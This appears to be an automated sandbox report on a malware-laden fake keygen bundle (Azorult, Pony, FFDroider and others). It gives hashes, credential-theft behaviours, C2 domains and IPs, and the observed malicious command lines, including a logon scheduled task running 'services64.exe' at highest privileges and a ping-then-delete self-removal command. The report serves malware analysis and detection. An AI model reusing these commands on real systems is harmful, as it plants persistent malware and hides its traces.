memory/1508-71-0x0000000000240000-0x0000000000260000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
| MD5 | f250a9c692088cce4253332a205b1649 |
| SHA1 | 109c79124ce2bda06cab50ea5d97294d13d42b20 |
| SHA256 | 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882 |
| SHA512 | 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e |
memory/1624-97-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1624-96-0x0000000003F30000-0x0000000004197000-memory.dmp
memory/1512-99-0x0000000000400000-0x0000000000667000-memory.dmp
memory/1508-100-0x00000000002F0000-0x000000000030A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabA11.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/1512-120-0x0000000000400000-0x0000000000667000-memory.dmp
memory/2876-119-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/1512-124-0x0000000000400000-0x0000000000667000-memory.dmp
memory/3012-125-0x0000000000560000-0x000000000056E000-memory.dmp
memory/2968-132-0x000000013F180000-0x000000013F190000-memory.dmp
memory/1512-134-0x0000000000400000-0x0000000000667000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/2068-153-0x0000000000400000-0x0000000002B4E000-memory.dmp
memory/1712-167-0x0000000000160000-0x000000000017E000-memory.dmp
memory/1712-168-0x00000000001F0000-0x000000000020A000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/2428-193-0x000000013FB20000-0x000000013FB26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TarE54.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2296 wrote to memory of 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2296 wrote to memory of 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2296 wrote to memory of 3164 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3164 wrote to memory of 4316 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 3164 wrote to memory of 4316 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 3164 wrote to memory of 4316 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.109.116.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
Files
memory/2296-0-0x0000000000EC0000-0x0000000000ED8000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win7-20240903-en
Max time kernel
62s
Max time network
149s
Command Line
Signatures
Azorult
Azorult family
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Pony family
Pony,Fareit
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2500 set thread context of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"
C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
keygen-step-1.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
keygen-step-6.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
keygen-step-3.exe
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
keygen-step-4.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104978 0
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe" -a
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 136
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| UA | 194.145.227.161:80 | tcp | |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.29:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.29:443 | evaexpand.com | tcp |
| GB | 89.116.109.29:443 | evaexpand.com | tcp |
| GB | 89.116.109.29:443 | evaexpand.com | tcp |
| GB | 89.116.109.29:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | oldhorse.info | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| SG | 37.0.10.214:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| SG | 37.0.10.244:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| MX | 31.210.20.251:80 | tcp | |
| UA | 194.145.227.161:80 | tcp | |
| UA | 194.145.227.161:80 | tcp |
Files
memory/2252-0-0x0000000000250000-0x0000000000268000-memory.dmp
memory/2764-5-0x00000000002F0000-0x00000000003D5000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
| MD5 | 51ef03c9257f2dd9b93bfdd74e96c017 |
| SHA1 | 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34 |
| SHA256 | 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf |
| SHA512 | 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1 |
memory/2472-36-0x0000000000790000-0x0000000000875000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\JOzWR.dat
| MD5 | 12476321a502e943933e60cfb4429970 |
| SHA1 | c71d293b84d03153a1bd13c560fca0f8857a95a7 |
| SHA256 | 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29 |
| SHA512 | f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc |
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
